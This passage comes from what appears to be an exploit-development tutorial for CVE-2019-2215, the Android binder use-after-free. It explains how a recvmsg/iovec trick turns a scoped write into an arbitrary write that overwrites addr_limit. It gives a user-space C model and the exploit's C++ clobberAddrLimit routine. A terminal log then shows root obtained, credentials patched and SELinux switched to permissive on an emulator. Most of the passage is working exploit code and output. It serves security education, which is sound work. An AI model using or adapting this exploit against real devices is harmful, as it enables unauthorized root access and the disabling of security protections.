- iovecStack[10].iov_len and iovecStack[11].iov_base are clobbered with a pointer to binder_thread->wait.head
- when recvmsg starts processing iovecStack[11], whose iov_base now points at wait.head (the same memory as iovecStack[10].iov_len), it will
  - write 1 to iovecStack[10].iov_len, which was clobbered earlier, basically restoring its initial value
  - write 0x41414141 to iovecStack[11].iov_base
  - write 0x20 to iovecStack[11].iov_len
  - write the address of addr_limit to iovecStack[12].iov_base
- now, when recvmsg starts processing iovecStack[12], it will
  - write 0xFFFFFFFFFFFFFFFE to addr_limit

This is how we convert the scoped write into a controlled arbitrary write.
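The self-overwriting step can be checked with a toy model that runs entirely in user space. Here a byte array mem[] stands in for memory and "addresses" are offsets into it; the reallocated chunk, viewed as 25 {iov_base, iov_len} pairs, starts at offset 0. WAIT_HEAD (0xA8) comes from the overlap table, while USER_PAGE and ADDR_LIMIT are arbitrary offsets chosen for the model. Like an iov_iter, the model reads each segment's iov_base and iov_len only when that segment starts. It is an illustration of the data flow under these assumptions, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { MEM_SIZE = 0x400, NR_SEGS = 25, USER_PAGE = 0x200,
       ADDR_LIMIT = 0x300, WAIT_HEAD = 0xA8 };

static uint8_t mem[MEM_SIZE];

static uint64_t ld(uint64_t off) { uint64_t v; memcpy(&v, &mem[off], 8); return v; }
static void st(uint64_t off, uint64_t v) { memcpy(&mem[off], &v, 8); }

/* Deliver `len` bytes into segments seg, seg + 1, ...; each segment's
 * base/len is read from mem[] when the segment starts. Assumes each
 * delivery ends on a segment boundary. Returns the next segment index,
 * or -1 on an out-of-range write. */
static int scatter(int seg, const uint8_t *data, size_t len)
{
    while (seg < NR_SEGS && len) {
        uint64_t base = ld((uint64_t)seg * 16);
        uint64_t seg_len = ld((uint64_t)seg * 16 + 8);
        size_t copy = len < seg_len ? len : (size_t)seg_len;
        if (base > MEM_SIZE || copy > MEM_SIZE - base)
            return -1;
        memcpy(&mem[base], data, copy);
        data += copy;
        len -= copy;
        seg++;
    }
    return seg;
}

static uint64_t run_model(void)
{
    memset(mem, 0, sizeof(mem));
    st(10 * 16, USER_PAGE);  st(10 * 16 + 8, 1);     /* iovecStack[10] */
    st(11 * 16, 0x41414141); st(11 * 16 + 8, 0x20);  /* iovecStack[11] */
    st(12 * 16, 0x42424242); st(12 * 16 + 8, 8);     /* iovecStack[12] */

    /* recvmsg: the 1 junk byte fills iovecStack[10], then it blocks. */
    const uint8_t junk = 0x41;
    int seg = scatter(0, &junk, 1);
    if (seg != 11)
        return 0;

    /* Unlink: wait.head.next (iovecStack[10].iov_len) and
     * wait.head.prev (iovecStack[11].iov_base) both become &wait.head. */
    st(WAIT_HEAD, WAIT_HEAD);
    st(WAIT_HEAD + 8, WAIT_HEAD);

    /* The child sends finalSocketData; recvmsg resumes at iovecStack[11]. */
    const uint64_t final_data[] = { 1, 0x41414141, 0x20, ADDR_LIMIT,
                                    0xFFFFFFFFFFFFFFFEULL };
    if (scatter(seg, (const uint8_t *)final_data, sizeof(final_data)) < 0)
        return 0;
    return ld(ADDR_LIMIT);
}
```

After run_model(), the slot standing in for addr_limit holds 0xFFFFFFFFFFFFFFFE, and iovecStack[10].iov_len has been restored to 1: the 0x20-byte write through iovecStack[11] rewrites the iovec array itself, and iovecStack[12] then carries the final 8 bytes to the chosen address.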

Let's build the attack plan to clobber addr_limit:

- create a socketpair and get the file descriptors
- write 0x1 byte of junk data to the socket's write descriptor
- link the eventpoll wait queue to the binder_thread wait queue
- fork the process
- parent process
  - free the binder_thread structure
  - trigger the recvmsg system call; it will process the 0x1 byte of junk data that we wrote, then block and wait to receive the rest of the data
  - once the recvmsg system call resumes, it will process iovecStack[11], which is already clobbered due to the unlink operation
  - once the recvmsg system call returns, addr_limit has been clobbered
- child process
  - sleep to avoid race conditions
  - trigger the unlink operation
  - write the rest of the data, finalSocketData, to the socket's write descriptor

Now, let's see how the same can be achieved in the exploit code.

```cpp
void BinderUaF::clobberAddrLimit() {
    int sock_fd[2] = {0};
    ssize_t nBytesWritten = 0;
    struct msghdr message = {nullptr};
    struct iovec iovecStack[IOVEC_COUNT] = {nullptr};

    //
    // Get binder fd
    //
    setupBinder();

    //
    // Create event poll
    //
    setupEventPoll();

    //
    // For clobbering the addr_limit we trigger the unlink
    // operation again after reallocating binder_thread with
    // iovecs
    //
    // We managed to leak kernel data by using
    // the blocking feature of writev
    //
    // We could use the readv blocking feature to do a scoped write.
    // However, after trying readv and reading the Linux kernel
    // code, I figured out an issue which makes readv useless for
    // the current bug.
    //
    // The main issue that I found is:
    //
    // iovecStack[IOVEC_WQ_INDEX].iov_len is clobbered with a pointer
    // due to the unlink operation
    //
    // So, when copy_page_to_iter_iovec tries to process the iovecs,
    // there is a line of code, copy = min(bytes, iov->iov_len);
    // Here, "bytes" is equal to the sum of all iovec lengths, and as
    // "iov->iov_len" is corrupted with a pointer, which is obviously
    // a very big number, copy = sum of all iovec lengths, which skips
    // the processing of the next iovec, the target iovec that
    // would give us the scoped write.
    //
    // I believe P0 also faced the same issue so they switched to recvmsg
    //

    //
    // Setup socketpair for iovec
    //
    // AF_UNIX/AF_LOCAL is used because we are interested only in
    // local communication
    //
    // We use SOCK_STREAM so that MSG_WAITALL can be used in recvmsg
    //
    INFO("[+] Setting up socket\n");

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock_fd) == -1) {
        ERR("\t[-] Unable to create socketpair\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Socketpair created successfully\n");
    }

    //
    // We will just write junk data to the socket so that when recvmsg
    // is called, it processes the first valid iovec with this junk data
    // and then blocks and waits for the rest of the data to be received
    //
    static char junkSocketData[] = {
        0x41
    };

    INFO("[+] Writing junk data to socket\n");
    nBytesWritten = write(sock_fd[1], &junkSocketData, sizeof(junkSocketData));

    if (nBytesWritten != sizeof(junkSocketData)) {
        ERR("\t[-] write failed. nBytesWritten: 0x%lx, expected: 0x%lx\n", nBytesWritten, sizeof(junkSocketData));
        exit(EXIT_FAILURE);
    }

    INFO("[+] Setting up iovecs\n");

    //
    // We want to block after processing the iovec at IOVEC_WQ_INDEX,
    // because then, we can trigger the unlink operation and get the
    // next iovecs corrupted to gain scoped write.
    //
    mmap4gbAlignedPage();

    iovecStack[IOVEC_WQ_INDEX].iov_base = m_4gb_aligned_page;
    iovecStack[IOVEC_WQ_INDEX].iov_len = 1;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_base = (void *) 0x41414141;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_len = 0x8 + 0x8 + 0x8 + 0x8;
    iovecStack[IOVEC_WQ_INDEX + 2].iov_base = (void *) 0x42424242;
    iovecStack[IOVEC_WQ_INDEX + 2].iov_len = 0x8;

    //
    // Prepare the data buffer that will be written to socket
    //

    //
    // Setting addr_limit to 0xFFFFFFFFFFFFFFFF in arm64
    // will result in crash because of a check in do_page_fault
    // However, x86_64 does not have this check. But it's better
    // to set it to 0xFFFFFFFFFFFFFFFE so that this same code can
    // be used in arm64 as well.
    //
    static uint64_t finalSocketData[] = {
        0x1,                                    // iovecStack[IOVEC_WQ_INDEX].iov_len
        0x41414141,                             // iovecStack[IOVEC_WQ_INDEX + 1].iov_base
        0x8 + 0x8 + 0x8 + 0x8,                  // iovecStack[IOVEC_WQ_INDEX + 1].iov_len
        (uint64_t) ((uint8_t *) m_task_struct +
                    OFFSET_TASK_STRUCT_ADDR_LIMIT), // iovecStack[IOVEC_WQ_INDEX + 2].iov_base
        0xFFFFFFFFFFFFFFFE                      // addr_limit value
    };

    //
    // Prepare the message
    //
    message.msg_iov = iovecStack;
    message.msg_iovlen = IOVEC_COUNT;

    //
    // Now link the poll wait queue to binder thread wait queue
    //
    linkEventPollWaitQueueToBinderThreadWaitQueue();

    //
    // We should trigger the unlink operation when we
    // have the binder_thread reallocated as iovec array
    //

    //
    // Now fork
    //
    pid_t childPid = fork();

    if (childPid == 0) {
        //
        // child process
        //

        //
        // There is a race window between the unlink and blocking
        // in recvmsg, so sleep for a while to ensure that we are
        // blocking in recvmsg before the unlink happens
        //
        sleep(2);

        //
        // Trigger the unlink operation on the reallocated chunk
        //
        unlinkEventPollWaitQueueFromBinderThreadWaitQueue();

        //
        // Now, at this point, the iovecStack[IOVEC_WQ_INDEX].iov_len
        // and iovecStack[IOVEC_WQ_INDEX + 1].iov_base are clobbered
        //
        // Write rest of the data to the socket so that recvmsg starts
        // processing the corrupted iovecs and we get scoped write and
        // finally arbitrary write
        //
        nBytesWritten = write(sock_fd[1], finalSocketData, sizeof(finalSocketData));

        if (nBytesWritten != sizeof(finalSocketData)) {
            ERR("\t[-] write failed. nBytesWritten: 0x%lx, expected: 0x%lx", nBytesWritten, sizeof(finalSocketData));
            exit(EXIT_FAILURE);
        }

        exit(EXIT_SUCCESS);
    }

    //
    // parent process
    //

    //
    // I have seen some races which hinder the reallocation.
    // So, now freeing the binder_thread after fork.
    //
    freeBinderThread();

    //
    // Reallocate binder_thread as iovec array and
    // we need to make sure this recvmsg call blocks.
    //
    // recvmsg will block after processing a valid iovec at
    // iovecStack[IOVEC_WQ_INDEX]
    //
    ssize_t nBytesReceived = recvmsg(sock_fd[0], &message, MSG_WAITALL);

    //
    // If the corruption was successful, the total bytes received
    // should be equal to the length of all iovecs. This is because
    // there are three valid iovecs
    //
    ssize_t expectedBytesReceived = iovecStack[IOVEC_WQ_INDEX].iov_len +
                                    iovecStack[IOVEC_WQ_INDEX + 1].iov_len +
                                    iovecStack[IOVEC_WQ_INDEX + 2].iov_len;

    if (nBytesReceived != expectedBytesReceived) {
        ERR("\t[-] recvmsg failed. nBytesReceived: 0x%lx, expected: 0x%lx\n", nBytesReceived, expectedBytesReceived);
        exit(EXIT_FAILURE);
    }

    //
    // Wait for the child process to exit
    //
    wait(nullptr);
}
```

I hope you now have a better idea of how we used the scoped write to achieve a controlled arbitrary write and clobbered addr_limit with 0xFFFFFFFFFFFFFFFE.

Exploit In Action

Let's see the exploit in action.

```
ashfaq@hacksys:~/workshop$ adb shell
generic_x86_64:/ $ uname -a
Linux localhost 4.14.150+ #1 repo:q-goldfish-android-goldfish-4.14-dev SMP PREEMPT Tue Apr x86_64
generic_x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
generic_x86_64:/ $ getenforce
Enforcing
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-exploit
## # # ### ### ### # ### ### ### # ###
# # # # # # # ## # # # # ## #
# # # ## ### ### # # # ### ### ### ### # ###
# # # # # # # # # # # # #
## # ### ### ### ### ### ### ### ### ###
@HackSysTeam
[+] Binding to 0th core
[+] Opening: /dev/binder
[*] m_binder_fd: 0x3
[+] Creating event poll
[*] m_epoll_fd: 0x4
[+] Setting up pipe
[*] Pipe created successfully
[*] Changed the pipe capacity to: 0x1000
[+] Setting up iovecs
[+] Mapping 4GB aligned page
[*] Mapped page: 0x100000000
[+] Linking eppoll_entry->wait.entry to binder_thread->wait.head
[+] Freeing binder_thread
[+] Un-linking eppoll_entry->wait.entry from binder_thread->wait.head
[*] Wrote 0x2000 bytes
[+] Leaked task_struct: 0xffff888063a14b00
[*] &task_struct->pid: 0xffff888063a14fe8
[*] &task_struct->cred: 0xffff888063a15188
[*] &task_struct->nsproxy: 0xffff888063a151c0
[+] Opening: /dev/binder
[*] m_binder_fd: 0x7
[+] Creating event poll
[*] m_epoll_fd: 0x8
[+] Setting up socket
[*] Socketpair created successfully
[+] Writing junk data to socket
[+] Setting up iovecs
[+] Linking eppoll_entry->wait.entry to binder_thread->wait.head
[+] Freeing binder_thread
[+] Un-linking eppoll_entry->wait.entry from binder_thread->wait.head
[+] Setting up pipe for kernel read/write
[*] Pipe created successfully
[+] Verifying arbitrary read/write primitive
[*] currentPid: 7039
[*] expectedPid: 7039
[*] Arbitrary read/write successful
[+] Patching current task cred members
[*] cred: 0xffff888066e016c0
[+] Verifying if selinux enforcing is enabled
[*] nsproxy: 0xffffffff81433ac0
[*] Kernel base: 0xffffffff80200000
[*] selinux_enforcing: 0xffffffff816acfe8
[*] selinux enforcing is enabled
[*] Disabled selinux enforcing
[+] Verifying if rooted
[*] uid: 0x0
[*] Rooting successful
[+] Spawning root shell
generic_x86_64:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
generic_x86_64:/data/local/tmp # getenforce
Permissive
generic_x86_64:/data/local/tmp #
```

You can see that we have achieved root and disabled SELinux.